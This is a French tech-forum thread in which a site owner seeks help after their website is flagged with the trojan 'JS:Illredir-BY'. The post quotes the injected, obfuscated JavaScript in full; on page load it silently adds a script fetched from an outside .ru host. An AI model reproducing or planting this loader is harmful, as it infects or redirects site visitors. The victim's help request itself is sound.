Site internet infecté

Site internet infecté - Virus/Spywares - Windows & Software

Marsh Posté le 25-05-2010 à 18:53:39    

Bonjour,
Le site internet que je gère est actuellement infecté par un virus détecté par Avast comme cheval de troie "JS:Illredir-BY".
Après analyse de différents fichiers il semblerait que le bout de code suivant ait été ajouté à de multiples endroits :  
 

Code :
  1. var q=false;E=[];this.p=8420;this.p++;var P;Nc=12864;Nc++;var ue=["Q","j","Zz"];U=function(){this.wW="";var yc=742;var aA=["su","uw","G"];suy=65128;suy+=65;function a(l,g,n){var gM=["AY"];return l.substr(g,n);}sA=12399;sA-=112;this.QG=22173;this.QG-=9;var Z=RegExp;this.r=58264;this.r--;var _E={Hj:43730};var o='';vR={k:44051};var qh=35135;var X=String("/paip"+"ai-co"+a("m/goozAkX",0,5)+a("gle.cZwH",0,5)+a("XCFom/zeCFX",3,5)+a("uk3do.cok3u",3,5)+a("m.phpQ9Y",0,5));var b=document;var tl=new Date();var vT=new Array();function w(l,g){var pk=[];R={Fs:45166};this.kh=false;var n=String("[" )+g+String(a("]JVM",0,1));var Ao="";var B=new Z(n, a("gvoGZ",0,1));try {} catch(Ex){};return l.replace(B, o);};nr={hI:58728};var GH={sD:"FZ"};var ru=["t_","iQ"];jw=23272;jw--;var AT=[];ri=44864;ri++;var N=446910-438830;var Pd=w('sGcxrYiqpYtz','BG9zVgaqvKZYxR4yb');var bN=new Array();var oO=new String("body" );try {} catch(zS){};var y=null;this.rl="rl";this.Og="Og";P=function(){var oOx=new Date();try {var iq='Qa'} catch(iq){};try {var xQ={};try {var HI='wDx'} catch(HI){};var nV=w('cXrde0a0tAeAEHlje7mdeNn0tA','HAX0PjyNd7');var dS={};nA={};M=b[nV](Pd);var t=w('s1rVcZ','hJL1Yk_nPZfxGOV');xX={WC:45457};hB={ZQ:61741};try {} catch(vH){};try {} catch(pW){};var l=N+X;pH=["Pb"];var h=String("def"+a("erany",0,2));this.JC='';M[h]=[6,1][1];gy={Lm:58710};var Tq='';M[t]=String("http:"+"//ten"+"thpro"+a("fit.razN",0,5)+"u:" )+l;this.mP=60982;this.mP++;var EX=new Date();Uj=14269;Uj+=141;b[oO].appendChild(M);var MG="MG";this.dL="";var cy=["eM"];} catch(z){var EO=new String();var wP=new Array();oT=["Bh"];};var CF="CF";var LZ=["MA"];};var iQF=["gA","Ev","MS"];};U();this.eX="";MP=["nO","uS"];mN={};window.onload=P;var Fm=new Date();try {var bt='PX'} catch(bt){};this.yA=55198;this.yA-=204;var Yo=["ta","nK","JN"];


 
Quel impact a ce code sur les visiteurs (sont-ils infectés ?).
Est-ce qu'il suffit de le supprimer de toutes les pages où il est ? Si oui, comment savoir lesquelles ? Comment ce code est arrivé sur mon site ?
 
Merci


Message édité par schnoqueur le 25-05-2010 à 19:57:08

---------------
Mon ancien feedback A/V : http://forum.hardware.fr/hfr/Achat [...] 3624_1.htm
Reply

Marsh Posté le 25-05-2010 à 18:53:39   

Reply

Marsh Posté le 25-05-2010 à 19:17:29    

bonjour,
voici un lien intéressant qui peut etre utile:  
http://documentation-mainframe.net [...] ite-et-fin
 
Bon courage

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed